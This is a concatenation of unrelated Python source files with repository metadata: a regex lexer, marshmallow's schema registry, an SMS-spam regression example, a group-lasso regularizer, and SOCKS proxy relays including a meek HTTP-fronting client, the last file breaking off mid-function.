class LexerError(Exception):
    """Signals that no rule matched the input.

    pos: position in the input line where the error occurred.
    """

    def __init__(self, pos):
        # Keep the failing offset so callers can report it.
        self.pos = pos
class Lexer(object):
    """Regex-driven tokenizer; see the __main__ demo below for usage."""

    def __init__(self, rules, skip_whitespace=True):
        """ Create a lexer.

            rules:
                A list of rules. Each rule is a `regex, type`
                pair, where `regex` is the regular expression used
                to recognize the token and `type` is the type
                of the token to return when it's recognized.

            skip_whitespace:
                If True, whitespace (\s+) will be skipped and not
                reported by the lexer. Otherwise, you have to
                specify your rules for whitespace, or it will be
                flagged as an error.
        """
        # Build one alternation regex out of all the rules. The named
        # groups (GROUP1, GROUP2, ...) stand in for the arbitrary token
        # type strings, which may not be valid group identifiers.
        regex_parts = []
        self.group_type = {}
        for position, rule in enumerate(rules):
            regex, type = rule
            groupname = 'GROUP%s' % (position + 1)
            regex_parts.append('(?P<%s>%s)' % (groupname, regex))
            self.group_type[groupname] = type
        self.regex = re.compile('|'.join(regex_parts))
        self.skip_whitespace = skip_whitespace
        self.re_ws_skip = re.compile('\S')

    def input(self, buf):
        """ Initialize the lexer with a buffer as input.
        """
        self.buf = buf
        self.pos = 0

    def token(self):
        """ Return the next token (a Token object) found in the
            input buffer. None is returned if the end of the
            buffer was reached.

            In case of a lexing error (the current chunk of the
            buffer matches no rule), a LexerError is raised with
            the position of the error.
        """
        if self.pos >= len(self.buf):
            return None
        if self.skip_whitespace:
            found = self.re_ws_skip.search(self.buf[self.pos:])
            if found is None:
                # Nothing but whitespace remains.
                return None
            self.pos += found.start()
        match = self.regex.match(self.buf[self.pos:])
        if match:
            name = match.lastgroup
            result = Token(self.group_type[name], match.group(name), self.pos)
            self.pos += match.end()
            return result
        # If we're here, no rule matched.
        raise LexerError(self.pos)

    def tokens(self):
        """ Returns an iterator to the tokens found in the buffer.
        """
        tok = self.token()
        while tok is not None:
            yield tok
            tok = self.token()
if __name__ == '__main__':
    # Demo: tokenize a simple assignment expression.
    rules = [
        ('\d+', 'NUMBER'),
        ('[a-zA-Z_]\w+', 'IDENTIFIER'),
        ('\+', 'PLUS'),
        ('\-', 'MINUS'),
        ('\*', 'MULTIPLY'),
        ('\/', 'DIVIDE'),
        ('\(', 'LP'),
        ('\)', 'RP'),
        ('=', 'EQUALS'),
    ]

    lx = Lexer(rules, skip_whitespace=True)
    lx.input('erw = _abc + 12*(R4-623902) ')

    try:
        for tok in lx.tokens():
            print tok
    # NOTE(review): Python 2 except syntax; under Python 3 this file
    # would need ``except LexerError as err`` and print().
    except LexerError, err:
        print 'LexerError at position', err.pos
| {
"repo_name": "AnthonyCAS/code-for-blog",
"path": "2009/py_rd_parser_example/lexer.py",
"copies": "14",
"size": "4583",
"license": "unlicense",
"hash": 8506505814438647000,
"line_mean": 30.1678321678,
"line_max": 67,
"alpha_frac": 0.4675976435,
"autogenerated": false,
"ratio": 4.4538386783284745,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.016948619993451937,
"num_lines": 143
} |
"""A registry of :class:`Schema <marshmallow.Schema>` classes. This allows for string
lookup of schemas, which may be used with
class:`fields.Nested <marshmallow.fields.Nested>`.
.. warning::
This module is treated as private API.
Users should not need to use this module directly.
"""
import typing
from marshmallow.exceptions import RegistryError
if typing.TYPE_CHECKING:
from marshmallow import Schema
SchemaType = typing.Type[Schema]
# {
#   <class_name>: <list of class objects>
#   <module_path_to_class>: <list of class objects>
# }
_registry = {}  # type: typing.Dict[str, typing.List["SchemaType"]]


def register(classname: str, cls: "SchemaType") -> None:
    """Add a class to the registry of serializer classes. When a class is
    registered, an entry for both its classname and its full, module-qualified
    path are added to the registry.

    Example: ::

        class MyClass:
            pass

        register('MyClass', MyClass)
        # Registry:
        # {
        #   'MyClass': [path.to.MyClass],
        #   'path.to.MyClass': [path.to.MyClass],
        # }
    """
    module = cls.__module__
    # Full module path to the class, e.g. user.schemas.UserSchema
    fullpath = ".".join([module, classname])
    registered = _registry.get(classname)
    if registered is None:
        _registry[classname] = [cls]
    elif all(entry.__module__ != module for entry in registered):
        # Same short name from a different module: keep both entries so
        # lookups by short name can detect the ambiguity.
        registered.append(cls)
    # The fully-qualified path always maps to exactly this class (both
    # branches of the original code reduced to a one-element list).
    _registry[fullpath] = [cls]
    return None


def get_class(
    classname: str, all: bool = False
) -> typing.Union[typing.List["SchemaType"], "SchemaType"]:
    """Retrieve a class from the registry.

    :raises: marshmallow.exceptions.RegistryError if the class cannot be found
        or if there are multiple entries for the given class name.
    """
    try:
        classes = _registry[classname]
    except KeyError as error:
        raise RegistryError(
            "Class with name {!r} was not found. You may need "
            "to import the class.".format(classname)
        ) from error
    if len(classes) > 1:
        if all:
            return _registry[classname]
        raise RegistryError(
            "Multiple classes with name {!r} "
            "were found. Please use the full, "
            "module-qualified path.".format(classname)
        )
    return classes[0]
| {
"repo_name": "marshmallow-code/marshmallow",
"path": "src/marshmallow/class_registry.py",
"copies": "1",
"size": "2836",
"license": "mit",
"hash": -6978642883984595000,
"line_mean": 30.1648351648,
"line_max": 85,
"alpha_frac": 0.6357545839,
"autogenerated": false,
"ratio": 4.074712643678161,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521046722757816,
"avg_score": null,
"num_lines": null
} |
# A Regression Digression
##########################
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer
from nltk.tokenize.casual import casual_tokenize
from nlpia.data.loaders import get_data

# Load the SMS spam dataset and build a TF-IDF document-term matrix whose
# columns are labelled with the (sorted) vocabulary terms.
sms = get_data('sms-spam')
tfidf = TfidfVectorizer(tokenizer=casual_tokenize)
tfidf_docs = tfidf.fit_transform(raw_documents=sms.text).toarray()
tfidf_docs = pd.DataFrame(tfidf_docs, columns=list(zip(*sorted([(v, k) for (k, v) in tfidf.vocabulary_.items()])))[1])
##########################
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA

# TFIDF->LDA
tfidf_lda = LDA(n_components=1)
tfidf_lda.fit(tfidf_docs, sms.spam)

# Most spammy terms (words) in the TFIDF:
tfidf_lda_coef = pd.DataFrame(list(zip(tfidf_lda.coef_[0, :], tfidf_docs.columns)), columns='coef term'.split())
print(tfidf_lda_coef.sort_values('coef', ascending=False).head())
#               coef                 term
# 2666  7.606693e+06              darling
# 7168  5.393772e+06             sexychat
# 895   5.202198e+06                80488
# 6085  4.865422e+06              parties
# 9025  4.852177e+06  www.07781482378.com
##########################
from sklearn.decomposition import PCA

# TFIDF->PCA->LDA: reduce to 256 topics before discriminating.
pca = PCA(n_components=256)
pca = pca.fit(tfidf_docs)
pca_topic_vectors = pca.transform(tfidf_docs)
pca_topic_vectors = pd.DataFrame(pca_topic_vectors, columns=['topic{}'.format(i) for i in range(pca.n_components_)])
pca_components = pd.DataFrame(pca.components_,
                              columns=tfidf_docs.columns,
                              index=['topic{}'.format(i) for i in range(pca.n_components_)])
##########################
pca_lda = LDA(n_components=1)
pca_lda.fit(pca_topic_vectors, sms.spam)
# Per-message probability of being spam under the PCA->LDA model.
sms['pca_lda_spam_prob'] = pca_lda.predict_proba(pca_topic_vectors)[:, 1]
##########################
# Which topics correlate most with the spam label?
pca_topic_vectors['spam_label_'] = sms.spam
print(pca_topic_vectors.corr().spam_label_.sort_values(ascending=False).head())
# spam_label_    1.000000
# topic4         0.564850
# topic2         0.275897
# topic10        0.186002
# topic9         0.167077
##########################
# topic4 is the most spam-correlated topic; keep it as a feature.
sms['topic4'] = pca_topic_vectors.topic4
##########################
from nltk.sentiment import SentimentIntensityAnalyzer

# VADER sentiment score (compound in [-1, 1]) for each message.
vader = SentimentIntensityAnalyzer()
scores = pd.DataFrame([vader.polarity_scores(text) for text in sms.text])
sms['vader'] = scores['compound']
sms.describe().tail()
#      spam  pca_lda_spam_prob   vader
# min   0.0       5.845537e-15 -0.9042
# 25%   0.0       2.155922e-09  0.0000
# 50%   0.0       2.822494e-08  0.0000
# 75%   0.0       1.172246e-06  0.5267
# max   1.0       1.000000e+00  1.0000
##########################
# Keep only messages with non-neutral sentiment.
mask = (sms.vader > 0.1) | (sms.vader < -0.1)
sms = sms[mask].copy()
##########################
from sklearn.preprocessing import StandardScaler

# Standardize each regression variable independently (zero mean, unit var).
scaler = StandardScaler()
for col in ['pca_lda_spam_prob', 'vader', 'topic4']:
    sms.loc[:, col] = scaler.fit_transform(sms[[col]])
def sentiment_scatter(sms=sms):
    """Scatter-plot topic 4 against every sentiment/spam estimate."""
    sample = sms.sort_values('topic4').sample(200)
    plt.figure(figsize=(10, 7.5))
    ax = plt.subplot(1, 1, 1)
    # Overlay each estimator's column on the same axes, one marker each.
    styles = [
        ('line', dict(color='g', marker='+', s=400, lw=3, alpha=.5)),
        ('sgd', dict(color='r', marker='x', s=200, lw=3, alpha=.5)),
        ('vader', dict(color='k', marker='s', s=100, alpha=.5)),
        ('neuron', dict(color='c', marker='.', s=100, alpha=.5)),
        ('pca_lda_spam_prob', dict(marker='o', s=150, color='b', alpha=.5)),
    ]
    for column, kwargs in styles:
        ax = sample.plot.scatter(x='topic4', y=column, ax=ax, **kwargs)
    plt.ylabel('Sentiment')
    plt.xlabel('Topic 4')
    plt.legend(['LinearRegressor', 'SGDRegressor', 'VADER', 'OneNeuronRegresor', 'PCA->LDA->spaminess'])
    plt.tight_layout()
    plt.grid()
    plt.show()


sentiment_scatter()
| {
"repo_name": "totalgood/nlpia",
"path": "src/nlpia/book/examples/ch05_regression_digression.py",
"copies": "1",
"size": "4707",
"license": "mit",
"hash": 5703010722630734000,
"line_mean": 27.8773006135,
"line_max": 118,
"alpha_frac": 0.6061185468,
"autogenerated": false,
"ratio": 2.8475499092558985,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3953668456055899,
"avg_score": null,
"num_lines": null
} |
"""A regularizer based on group-lasso.
All the weights that are related to a single output are grouped into one LASSO
group (https://arxiv.org/pdf/1611.06321.pdf).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from morph_net.framework import generic_regularizers
from morph_net.framework import tpu_util
import tensorflow.compat.v1 as tf
class GroupLassoRegularizer(generic_regularizers.OpRegularizer):
  """A regularizer for convolutions and matmul operations, based on group-lasso.

  Supported ops: Conv2D, Conv2DBackpropInput (transposed Conv2D), and MatMul
  are supported. The grouping is done according to the formula:

  (1 - l1_fraction) * L2(weights) / sqrt(dim) + l1_fraction * L1(weights) / dim,

  where `dim` is the number of weights associated with an activation, L2 and L1
  are the respective norms, and l1_fraction controls the balance between L1 and
  L2 grouping. The paper cited above experiments with 0.0 and 0.5 for
  l1_fraction.
  """

  def __init__(self, weight_tensor, reduce_dims, threshold, l1_fraction=0.0):
    """Creates an instance.

    Args:
      weight_tensor: A tensor with the weights of the op (potentially sliced).
      reduce_dims: A tuple indictaing the dimensions of `weight_tensor`
        to reduce over. Most often it will include all dimensions except
        the output size.
      threshold: A float. When the norm of the group associated with an
        activation is below the threshold, it will be considered dead.
      l1_fraction: A float, controls the balance between L1 and L2 grouping
        (see above).
    """
    weight_tensor = tpu_util.maybe_convert_to_variable(weight_tensor)
    if l1_fraction < 0.0 or l1_fraction > 1.0:
      raise ValueError(
          'l1_fraction should be in [0.0, 1.0], not %e.' % l1_fraction)
    self._threshold = threshold
    # Per-output-group L2 norm over the reduced dimensions.
    group_l2 = tf.sqrt(
        tf.reduce_mean(tf.square(weight_tensor), axis=reduce_dims))
    if l1_fraction > 0.0:
      # Blend in the per-group L1 norm when requested.
      group_l1 = tf.reduce_mean(tf.abs(weight_tensor), axis=reduce_dims)
      blended = l1_fraction * group_l1 + (1.0 - l1_fraction) * group_l2
    else:
      blended = group_l2
    self._regularization_vector = blended
    # A group is "alive" while its norm exceeds the threshold.
    self._alive_vector = blended > threshold

  @property
  def regularization_vector(self):
    return self._regularization_vector

  @property
  def alive_vector(self):
    return self._alive_vector
| {
"repo_name": "google-research/morph-net",
"path": "morph_net/op_regularizers/group_lasso_regularizer.py",
"copies": "1",
"size": "2417",
"license": "apache-2.0",
"hash": -1420001296472025000,
"line_mean": 36.1846153846,
"line_max": 80,
"alpha_frac": 0.704178734,
"autogenerated": false,
"ratio": 3.6074626865671644,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4811641420567164,
"avg_score": null,
"num_lines": null
} |
# a relay forward local socks to a remote socks through meek (i.e., HTTP transport).
import logging
import uuid
import random
import ssl
from collections import defaultdict
import gevent
from gevent import select
from gevent import socket
from gevent.queue import Queue, LifoQueue
from gevent.event import Event
from geventhttpclient import HTTPClient, URL
from gsocks.relay import RelayFactory, RelaySession, RelaySessionError
from gsocks.msg import Reply, GENERAL_SOCKS_SERVER_FAILURE
from gsocks.utils import SharedTimer, bind_local_udp, request_fail, request_success, \
sock_addr_info
from constants import SESSION_ID_LENGTH, MAX_PAYLOAD_LENGTH, HEADER_SESSION_ID, \
HEADER_UDP_PKTS, HEADER_MODE, HEADER_MSGTYPE, MSGTYPE_DATA, MODE_STREAM, \
HEADER_ERROR, CLIENT_MAX_TRIES, CLIENT_RETRY_DELAY, CLIENT_INITIAL_POLL_INTERVAL, \
CLIENT_POLL_INTERVAL_MULTIPLIER, CLIENT_MAX_POLL_INTERVAL, MSGTYPE_TERMINATE, \
CLIENT_MAX_FAILURE
log = logging.getLogger(__name__)
def session_id():
    """Generate a random identifier for a new meek session."""
    uid = str(uuid.uuid4())
    return uid[:SESSION_ID_LENGTH]
def get_meek_meta(headers, key, default=""):
    """Case-insensitive lookup of *key* in HTTP response headers.

    The HTTP client library reports header names lower-cased, so the
    requested key is lower-cased before the lookup. *headers* may be a
    mapping or an iterable of (name, value) pairs.
    """
    lowered = dict(headers)
    return lowered.get(key.lower(), default)
class Relay:
    """A single meek relay endpoint plus its failure bookkeeping.

    Attributes:
        fronturl: fronting (CDN) URL used for the HTTP transport.
        hostname: real meek server hostname, sent in the Host header.
        properties: space-separated capability flags (e.g. "verify stream").
        failure: count of consecutive round-trip failures for this relay.
    """
    def __init__(self, fronturl="", hostname="", properties="", failure=0):
        self.failure = failure
        self.properties = properties
        self.hostname = hostname
        self.fronturl = fronturl
class HTTPClientPool:
    """Pool of keep-alive HTTP clients, one LIFO stack per fronting URL."""
    def __init__(self):
        # Missing keys lazily create an empty LIFO queue of idle clients.
        self.pool = defaultdict(LifoQueue)
    def get(self, relay, ca_certs, timeout):
        """Return an idle client for *relay*, creating a new one if none."""
        try:
            return self.pool[relay.fronturl].get(block=False)
        except gevent.queue.Empty:
            pass
        # No pooled connection: build a fresh client for this front.
        insecure = "verify" not in relay.properties
        ssl_options = {'ssl_version': ssl.PROTOCOL_TLSv1}
        if ca_certs:
            ssl_options['ca_certs'] = ca_certs
        return HTTPClient.from_url(
            URL(relay.fronturl),
            insecure=insecure,
            block_size=MAX_PAYLOAD_LENGTH,
            connection_timeout=timeout,
            network_timeout=timeout,
            concurrency=1,
            ssl_options=ssl_options
        )
    def release(self, relay, conn):
        """Put *conn* back on the idle stack for its fronting URL."""
        self.pool[relay.fronturl].put(conn)
class MeekSession(RelaySession):
    """One SOCKS session relayed to a remote socks server over meek (HTTP).

    Local client traffic is queued (l2m_queue) and shipped upstream in HTTP
    POST bodies; downstream data from response bodies is queued (m2l_queue)
    and written back to the client. Three greenlets cooperate per session:
    a relay/poller, a client reader and a client writer, signalled via the
    m_notifier / l_notifier events and all stopped through `finish`.
    """
    # Shared by all sessions so keep-alive connections are reused per front.
    conn_pool = HTTPClientPool()
    def __init__(self, socksconn, meek, timeout):
        super(MeekSession, self).__init__(socksconn)
        self.sessionid = session_id()
        self.meek = meek
        self.meektimeout = timeout
        self.relay = self.meek.select_relay()
        self.ca_certs = self.meek.ca_certs
        self.httpclient = self.conn_pool.get(self.relay, self.ca_certs, self.meektimeout)
        # udpsock stays None for TCP sessions; set in cmd_udp_associate.
        self.udpsock = None
        self.allsocks = [self.socksconn]
        # local->meek and meek->local data queues.
        self.l2m_queue = Queue()
        self.m2l_queue = Queue()
        self.m_notifier = Event()
        self.l_notifier = Event()
        self.finish = Event()
        self.m_notifier.clear()
        self.l_notifier.clear()
        self.finish.clear()
        self.timer = SharedTimer(self.meektimeout)
    def _stream_response(self, response):
        """Yield (chunk, "") pairs as a streamed response body arrives."""
        try:
            chunk = response.read(MAX_PAYLOAD_LENGTH)
            while chunk:
                log.debug("%s streaming DOWN %d bytes" % (self.sessionid, len(chunk)))
                yield chunk, ""
                chunk = response.read(MAX_PAYLOAD_LENGTH)
        except GeneratorExit:
            response.release()
            # NOTE(review): raising StopIteration inside a generator is a
            # RuntimeError under PEP 479 (Python 3.7+); confirm this module
            # only targets interpreters where this is legal.
            raise StopIteration
    def meek_response(self, response, stream):
        """Turn an HTTP response into (data, err) pairs.

        Returns a generator in streaming mode, otherwise a list. For UDP
        sessions the body is split back into datagrams using the packet
        lengths advertised in the HEADER_UDP_PKTS response header.
        """
        if stream:
            return self._stream_response(response)
        data = response.read()
        response.release()
        if not data:
            return [("", "")]
        if not self.udpsock:
            return [(data, "")]
        # parse UDP packets
        log.debug("%s DOWN %d bytes" % (self.sessionid, len(data)))
        lengths = get_meek_meta(response.headers, HEADER_UDP_PKTS).split(",")
        pos = 0
        pkts = []
        for length in lengths:
            nxt = pos + int(length)
            pkts.append((data[pos:nxt], ""))
            pos = nxt
        return pkts
    def meek_roundtrip(self, pkts):
        """POST *pkts* upstream and return the resulting (data, err) pairs.

        Retries up to CLIENT_MAX_TRIES times on non-200 responses and
        transport errors; a socket timeout or a server-reported error aborts
        immediately. On exhausting retries the relay's failure count is
        bumped so select_relay() can eventually drop it.
        """
        headers = {
            HEADER_SESSION_ID: self.sessionid,
            HEADER_MSGTYPE: MSGTYPE_DATA,
            'Host': self.relay.hostname,
            'Content-Type': "application/octet-stream",
            'Connection': "Keep-Alive",
        }
        stream = False
        if not self.udpsock and "stream" in self.relay.properties:
            # TCP session against a stream-capable relay: ask for streaming.
            stream = True
            headers[HEADER_MODE] = MODE_STREAM
        if pkts and self.udpsock:
            # Record each datagram's length so the server can re-split them.
            lengths = str(",".join([str(len(p)) for p in pkts]))
            headers[HEADER_UDP_PKTS] = lengths
        data = "".join(pkts)
        headers['Content-Length'] = str(len(data))
        for _ in range(CLIENT_MAX_TRIES):
            try:
                log.debug("%s UP %d bytes" % (self.sessionid, len(data)))
                resp = self.httpclient.post("/", body=data, headers=headers)
                if resp.status_code != 200:
                    # meek server always give 200, so all non-200s mean external issues.
                    continue
                err = get_meek_meta(resp.headers, HEADER_ERROR)
                if err:
                    return [("", err)]
                else:
                    try:
                        return self.meek_response(resp, stream)
                    except Exception as ex:
                        log.error("[Exception][meek_roundtrip - meek_response]: %s" % str(ex))
                        resp.release()
                        return [("", "Data Format Error")]
            except socket.timeout: # @UndefinedVariable
                return [("", "timeout")]
            except Exception as ex:
                log.error("[Exception][meek_roundtrip]: %s" % str(ex))
            gevent.sleep(CLIENT_RETRY_DELAY)
        self.relay.failure += 1
        return [("", "Max Retry (%d) Exceeded" % CLIENT_MAX_TRIES)]
    def meek_sendrecv(self):
        """Drain l2m_queue upstream in MAX_PAYLOAD_LENGTH batches.

        Yields every (data, err) pair coming back; stops early on error or
        an empty response. A final (possibly empty) round-trip acts as the
        downstream poll.
        """
        pkts = []
        datalen = 0
        while not self.l2m_queue.empty():
            pkt = self.l2m_queue.get()
            pkts.append(pkt)
            datalen += len(pkt)
            if datalen >= MAX_PAYLOAD_LENGTH:
                for (resp, err) in self.meek_roundtrip(pkts):
                    yield (resp, err)
                    if err or not resp:
                        return
                pkts = []
                datalen = 0
        for (resp, err) in self.meek_roundtrip(pkts):
            yield (resp, err)
            if err or not resp:
                return
    def meek_relay(self):
        """Run one upstream exchange; queue downstream data for the client.

        Returns "" on success or an error string.
        """
        for (resp, err) in self.meek_sendrecv():
            if err:
                return err
            if resp:
                self.m2l_queue.put(resp)
                self.l_notifier.set()
        return ""
    def meek_relay_thread(self):
        """Greenlet: poll the relay, backing off while the link is idle."""
        interval = CLIENT_INITIAL_POLL_INTERVAL
        while not self.finish.is_set():
            try:
                hasdata = self.m_notifier.wait(timeout=interval)
                self.m_notifier.clear()
                err = self.meek_relay()
                if err:
                    break
                if not hasdata:
                    # Idle: stretch the poll interval up to the maximum.
                    interval *= CLIENT_POLL_INTERVAL_MULTIPLIER
                    if interval > CLIENT_MAX_POLL_INTERVAL:
                        interval = CLIENT_MAX_POLL_INTERVAL
            except Exception as ex:
                log.error("[Exception][meek_relay_thread]: %s" % str(ex))
                break
        self.finish.set()
    def write_to_client(self, data):
        """Deliver downstream bytes to the client (UDP datagram or TCP)."""
        if self.udpsock:
            self.udpsock.sendto(data, self.last_clientaddr)
        else:
            self.socksconn.sendall(data)
    def meek_write_to_client_thread(self):
        """Greenlet: drain m2l_queue to the client; time out idle sessions."""
        while not self.finish.is_set():
            try:
                hasdata = self.l_notifier.wait(timeout=CLIENT_MAX_POLL_INTERVAL)
                self.l_notifier.clear()
                if not hasdata:
                    self.timer.count(CLIENT_MAX_POLL_INTERVAL)
                    if self.timer.timeout():
                        break
                else:
                    self.timer.reset()
                    while not self.m2l_queue.empty():
                        data = self.m2l_queue.get()
                        if data:
                            self.write_to_client(data)
            except Exception as ex:
                log.error("[Exception][meek_write_to_client_thread]: %s" % str(ex))
                break
        self.finish.set()
    def read_from_client(self, timeout):
        """Read one chunk/datagram from the client, or None on poll timeout.

        Raises RelaySessionError when the TCP peer closes or a TCP read
        event shows up mid-UDP-session.
        """
        # NOTE(review): the `timeout` argument is ignored; the select below
        # always uses CLIENT_MAX_POLL_INTERVAL — confirm this is intended.
        readable, _, _ = select.select(self.allsocks, [], [], CLIENT_MAX_POLL_INTERVAL)
        if not readable:
            return None
        if self.socksconn in readable:
            if self.udpsock:
                raise RelaySessionError("unexcepted read-event from tcp socket in UDP session")
            data = self.socksconn.recv(MAX_PAYLOAD_LENGTH)
            if not data:
                raise RelaySessionError("peer closed")
            return data
        if self.udpsock and self.udpsock in readable:
            data, addr = self.udpsock.recvfrom(MAX_PAYLOAD_LENGTH)
            # Drop datagrams from addresses outside the association.
            if not self.valid_udp_client(addr):
                return None
            else:
                self.last_clientaddr = addr
                return data
    def meek_read_from_client_thread(self):
        """Greenlet: feed client data into l2m_queue and wake the relay."""
        while not self.finish.is_set():
            try:
                data = self.read_from_client(CLIENT_MAX_POLL_INTERVAL)
                if not data:
                    self.timer.count(CLIENT_MAX_POLL_INTERVAL)
                    if self.timer.timeout():
                        break
                else:
                    self.timer.reset()
                    self.l2m_queue.put(data)
                    self.m_notifier.set()
            except Exception as ex:
                log.error("[Exception][meek_read_from_client_thread]: %s" % str(ex))
                break
        self.finish.set()
    def proc_tcp_request(self, req):
        # Queue the packed SOCKS request as the first upstream payload.
        self.l2m_queue.put(req.pack())
    def relay_tcp(self):
        """Run the three relay greenlets until the session finishes."""
        read_thread = gevent.spawn(self.meek_read_from_client_thread)
        write_thread = gevent.spawn(self.meek_write_to_client_thread)
        relay_thread = gevent.spawn(self.meek_relay_thread)
        # notify relay to send request
        self.m_notifier.set()
        [t.join() for t in (read_thread, write_thread, relay_thread)]
        log.info("Session %s Ended" % self.sessionid)
    def valid_udp_client(self, addr):
        """True if a datagram from *addr* belongs to this UDP association."""
        if self.client_associate[0] == "0.0.0.0" or \
            self.client_associate[0] == "::":
            return True
        if self.client_associate == addr:
            return True
        return False
    def cmd_udp_associate(self, req):
        """Handle SOCKS UDP ASSOCIATE: set up the UDP relay and run it."""
        self.client_associate = (req.dstaddr, req.dstport)
        self.last_clientaddr = self.client_associate
        # Forward the associate request upstream and wait for the reply.
        for (resp, err) in self.meek_roundtrip([req.pack()]):
            if err:
                return
            if resp:
                # NOTE(review): the parsed Reply is discarded — presumably
                # only parsing/validation was intended; verify.
                Reply(resp)
        self.udpsock = bind_local_udp(self.socksconn)
        if not self.udpsock:
            request_fail(self.socksconn, req, GENERAL_SOCKS_SERVER_FAILURE)
            return
        self.track_sock(self.udpsock)
        read_thread = gevent.spawn(self.meek_read_from_client_thread)
        write_thread = gevent.spawn(self.meek_write_to_client_thread)
        relay_thread = gevent.spawn(self.meek_relay_thread)
        request_success(self.socksconn, *sock_addr_info(self.udpsock))
        [t.join() for t in (read_thread, write_thread, relay_thread)]
        log.info("Session %s Ended" % self.sessionid)
    def meek_terminate(self):
        """Best-effort notification to the server that the session ended."""
        headers = {
            HEADER_SESSION_ID: self.sessionid,
            HEADER_MSGTYPE: MSGTYPE_TERMINATE,
            #'Content-Type': "application/octet-stream",
            'Content-Length': "0",
            'Connection': "Keep-Alive",
            'Host': self.relay.hostname,
        }
        try:
            # NOTE(review): uses `data=` while meek_roundtrip uses `body=`;
            # any failure is swallowed by the bare except — confirm kwarg.
            self.httpclient.post("/", data="", headers=headers)
        except:
            pass
    def clean(self):
        """Terminate upstream, close sockets, recycle the HTTP client."""
        self.meek_terminate()
        for sock in self.allsocks:
            sock.close()
        #self.httpclient.close()
        self.conn_pool.release(self.relay, self.httpclient)
class MeekRelayFactory(RelayFactory):
    """RelayFactory producing MeekSession objects over fronted HTTP."""
    def __init__(self, relays, ca_certs="", timeout=60):
        self.relays = relays
        self.timeout = timeout
        self.ca_certs = ca_certs
    def set_relays(self, relays):
        """Replace the candidate relay list (e.g. after a config reload)."""
        self.relays = relays
    def select_relay(self):
        """Drop relays with too many failures, then pick one at random."""
        healthy = [r for r in self.relays if r.failure < CLIENT_MAX_FAILURE]
        self.relays = healthy
        return random.choice(healthy)
    def create_relay_session(self, socksconn, clientaddr):
        """Build a MeekSession for a freshly accepted SOCKS connection."""
        session = MeekSession(socksconn, self, self.timeout)
        log.info("Session %s created for connection from %s" % (session.sessionid, str(clientaddr)))
        return session
| {
"repo_name": "kang000feng/firefly-proxy",
"path": "meeksocks/relay.py",
"copies": "6",
"size": "13509",
"license": "bsd-2-clause",
"hash": -6478067166150855000,
"line_mean": 36.1153846154,
"line_max": 100,
"alpha_frac": 0.5368273003,
"autogenerated": false,
"ratio": 4.042190305206463,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.01724853190760661,
"num_lines": 364
} |
# a relay forward local socks to remote socks,
import logging
from gevent import socket
from relay import RelayFactory, RelaySession, RelaySessionError
from utils import pipe_tcp, bind_local_udp, request_fail, send_request, \
sock_addr_info, read_reply, request_success, pipe_udp, read_init_request, \
read_init_reply, read_request
from msg import GENERAL_SOCKS_SERVER_FAILURE, UDP_ASSOCIATE, SUCCEEDED, \
CONNECT, BIND
log = logging.getLogger(__name__)
class SocksForwardSession(RelaySession):
    """Forwards a local SOCKS connection verbatim to an upstream SOCKS server.

    Handles the handshake pass-through, then pipes TCP bytes or UDP
    datagrams between the client and the remote server.
    """
    def __init__(self, socksconn, remoteconn):
        super(SocksForwardSession, self).__init__(socksconn)
        self.remoteconn = remoteconn
        self.track_sock(self.remoteconn)
        # Remember the remote socket's timeout for the piping helpers.
        self.remotetimeout = self.remoteconn.gettimeout()
        self.client_associate = None        # (addr, port) from UDP ASSOCIATE
        self.last_clientaddr = None         # last UDP endpoint seen from client
        self.client2local_udpsock = None
        self.local2remote_udpsock = None
    def proc_tcp_request(self, req):
        """Send the client's SOCKS request unchanged to the remote server."""
        self.remoteconn.sendall(req.pack())
    def relay_tcp(self):
        """Pump TCP bytes both ways until either side closes or times out."""
        # NOTE(review): self.timeout is presumably set by RelaySession —
        # confirm against the base class.
        pipe_tcp(self.socksconn, self.remoteconn, self.timeout, self.remotetimeout)
    def proc_udp_request(self, req):
        """Set up both UDP legs (client<->local, local<->remote).

        Returns True when the association succeeded and a success reply was
        sent to the client; False otherwise (a failure reply is sent when
        the local sockets could not be bound).
        """
        self.client_associate = (req.dstaddr, req.dstport)
        self.last_clientaddr = self.client_associate
        self.client2local_udpsock = bind_local_udp(self.socksconn)
        self.local2remote_udpsock = bind_local_udp(self.remoteconn)
        if not self.client2local_udpsock or not self.local2remote_udpsock:
            request_fail(self.socksconn, req, GENERAL_SOCKS_SERVER_FAILURE)
            return False
        self.track_sock(self.client2local_udpsock)
        self.track_sock(self.local2remote_udpsock)
        send_request(self.remoteconn, UDP_ASSOCIATE, *sock_addr_info(self.local2remote_udpsock))
        reply = read_reply(self.remoteconn)
        if reply.rep != SUCCEEDED:
            return False
        self.remote_associate = (reply.bndaddr, reply.bndport)
        request_success(self.socksconn, *sock_addr_info(self.client2local_udpsock))
        return True
    def relay_udp(self):
        """Pipe datagrams between client and remote with address rewriting."""
        def addrchecker():
            # Accept only datagrams from the associated client address
            # (wildcard associations accept any source).
            def _(ip, port):
                if self.client_associate[0] == "0.0.0.0" or \
                   self.client_associate[0] == "::":
                    return True
                if self.client_associate == (ip, port):
                    return True
                return False
            return _
        def c2r():
            # Client -> remote: remember the client's address, retarget to
            # the remote association endpoint.
            def _(data, addr):
                self.last_clientaddr = addr
                return data, self.remote_associate
            return _
        def r2c():
            # Remote -> client: deliver to the last known client endpoint.
            def _(data, addr):
                return data, self.last_clientaddr
            return _
        pipe_udp([self.socksconn, self.remoteconn],
                 self.client2local_udpsock, self.local2remote_udpsock,
                 self.timeout, self.remotetimeout,
                 addrchecker(), c2r(), r2c())
    def cmd_udp_associate(self, req):
        """Handle UDP ASSOCIATE: establish both legs, then relay."""
        if self.proc_udp_request(req):
            self.relay_udp()
    def process(self):
        """Run the full session: handshake pass-through, then the command."""
        try:
            initreq = read_init_request(self.socksconn)
            self.remoteconn.sendall(initreq.pack())
            initreply = read_init_reply(self.remoteconn)
            self.socksconn.sendall(initreply.pack())
            req = read_request(self.socksconn)
            # Dispatch on the SOCKS command byte.
            {
                CONNECT: self.cmd_connect,
                BIND: self.cmd_bind,
                UDP_ASSOCIATE : self.cmd_udp_associate
